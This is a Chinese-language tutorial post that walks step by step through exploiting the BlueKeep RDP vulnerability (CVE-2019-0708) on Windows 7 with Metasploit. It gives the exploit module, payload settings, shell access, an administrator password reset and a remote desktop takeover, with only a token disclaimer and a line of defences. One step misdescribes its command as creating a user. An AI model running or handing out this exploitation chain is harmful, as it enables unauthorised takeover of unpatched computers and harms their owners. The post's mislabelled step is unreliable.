白帽子黑客與網路安全工程師帶你:遠端桌面漏洞利用與Windows7計算機攻防實戰
一、課前宣告:
1、本分享僅做學習交流,請自覺遵守法律法規!
2、搜尋:Kali 與程式設計,學習更多網路攻防乾貨!
3、Kali 與程式設計每天準時更新,敬請學習和關注!
二、戰略安排
2.1 開啟Metasploit滲透框架,如下如所示。
命令:msfconsole
2.2 檢索有關遠端桌面的已知漏洞,如下圖所示。
命令:search 0708
2.3 使用檢索到的關於遠端桌面的漏洞利用模組,如下圖所示。
命令:use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
2.4 檢視攻擊目標需要設定的引數,如下圖所示。
命令:show targets
2.5 設定相關攻擊引數,如下圖所示。
set lhost 192.168.0.102
set target 4
2.6 執行漏洞攻擊模組,如下圖所示。
命令:run
2.7 利用建立起來的會話檢視受害者主機系統的相關資訊,如下圖所示。
命令:sysinfo
2.8 利用建立起來的會話檢視受害者主機系統的相關資訊,如下圖所示。
命令:ipconfig
2.9 檢視會話命令幫助資訊,如下圖所示。
命令:?
2.10 進入受害者主機cmd介面並解決亂碼問題,如下圖所示。
命令:shell
chnp 65001
2.11 利用“whoami”命令檢視相關資訊,如下圖所示。
命令;whoami
2.12 利用cmd命令在受害者主機建立一個新使用者,如下圖所示。
命令:net user administrator 123456
2.13 利用圖形化遠端桌面登入工具登入受害者主機,如下圖所示。
2.14 成功利用圖形化遠端登入工具拿下目標主機,如下圖所示。
2.15 遠端桌面漏洞防護措施,如下圖所示(關閉遠端桌面登入服務、開啟防火牆、安裝第三方電腦管家等等)。
辛苦原創,你的每一次評論點贊和關注,都是我們源源不斷的創作動力哦!你也可搜尋:Kali 與程式設計,學習更多 Kali Linux 滲透與白帽程式設計技巧呢!
點我學習更多Kali Linux滲透測試與網路攻防實戰技巧!